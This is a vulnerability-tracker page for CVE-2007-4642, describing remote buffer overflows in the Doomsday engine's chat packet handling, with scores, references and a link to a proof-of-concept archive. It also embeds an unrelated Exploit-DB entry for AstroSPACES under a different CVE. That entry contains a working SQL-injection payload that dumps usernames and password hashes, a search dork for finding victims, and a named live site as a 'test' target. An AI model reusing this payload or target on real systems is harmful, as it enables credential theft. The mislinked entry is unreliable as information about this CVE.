CVE-2007-4642
published 2007-08-31CVE-2007-4642: Multiple buffer overflows in Doomsday (aka deng) 1.9.0-beta5.1 and earlier allow remote attackers to execute arbitrary code via a long chat (PKT_CHAT) message…
PriorityP352critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
16.31%
96.6th percentile
Multiple buffer overflows in Doomsday (aka deng) 1.9.0-beta5.1 and earlier allow remote attackers to execute arbitrary code via a long chat (PKT_CHAT) message that is not properly handled by the (1) D_NetPlayerEvent function in d_net.c or the (2) Msg_Write function in net_msg.c, or (3) many commands that are not properly handled by the NetSv_ReadCommands function in d_netsv.c; or (4) cause a denial of service (daemon crash) via a chat (PKT_CHAT) message without a final '\0' character.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| doomsday | doomsday | <= 1.9.0_beta5.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AstroSPACES 1.1.1 - 'id' SQL Injection
exploitdb·2008-10-15
CVE-2008-4642 AstroSPACES 1.1.1 - 'id' SQL Injection
AstroSPACES 1.1.1 - 'id' SQL Injection
---
# AstroSPACES (profile.php) SQL
Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr (Sehitler Ölmez Vatan Bölünmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :
profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
test sites:
http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,
Exploit-DB
Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities
exploitdb·2007-08-29
CVE-2007-4642 Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities
Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities
---
source: https://www.securityfocus.com/bid/25483/info
Doomsday Engine is prone to multiple remote vulnerabilities, including multiple buffer-overflow issues, a denial-of-service issue, a format-string issue, and an integer-overflow issue.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
Doomsday Engine 1.90-beta5.1 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30543.zip
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/dumsdei-adv.txthttp://aluigi.org/poc/dumsdei.ziphttp://bugs.gentoo.org/show_bug.cgi?id=190835http://secunia.com/advisories/26524http://secunia.com/advisories/28821http://security.gentoo.org/glsa/glsa-200802-02.xmlhttp://securityreason.com/securityalert/3084http://www.securityfocus.com/archive/1/478077/100/0/threadedhttp://www.securityfocus.com/bid/25483https://exchange.xforce.ibmcloud.com/vulnerabilities/36332https://exchange.xforce.ibmcloud.com/vulnerabilities/36333https://exchange.xforce.ibmcloud.com/vulnerabilities/36334http://aluigi.altervista.org/adv/dumsdei-adv.txthttp://aluigi.org/poc/dumsdei.ziphttp://bugs.gentoo.org/show_bug.cgi?id=190835http://secunia.com/advisories/26524http://secunia.com/advisories/28821http://security.gentoo.org/glsa/glsa-200802-02.xmlhttp://securityreason.com/securityalert/3084http://www.securityfocus.com/archive/1/478077/100/0/threadedhttp://www.securityfocus.com/bid/25483https://exchange.xforce.ibmcloud.com/vulnerabilities/36332https://exchange.xforce.ibmcloud.com/vulnerabilities/36333https://exchange.xforce.ibmcloud.com/vulnerabilities/36334
2007-08-31
Published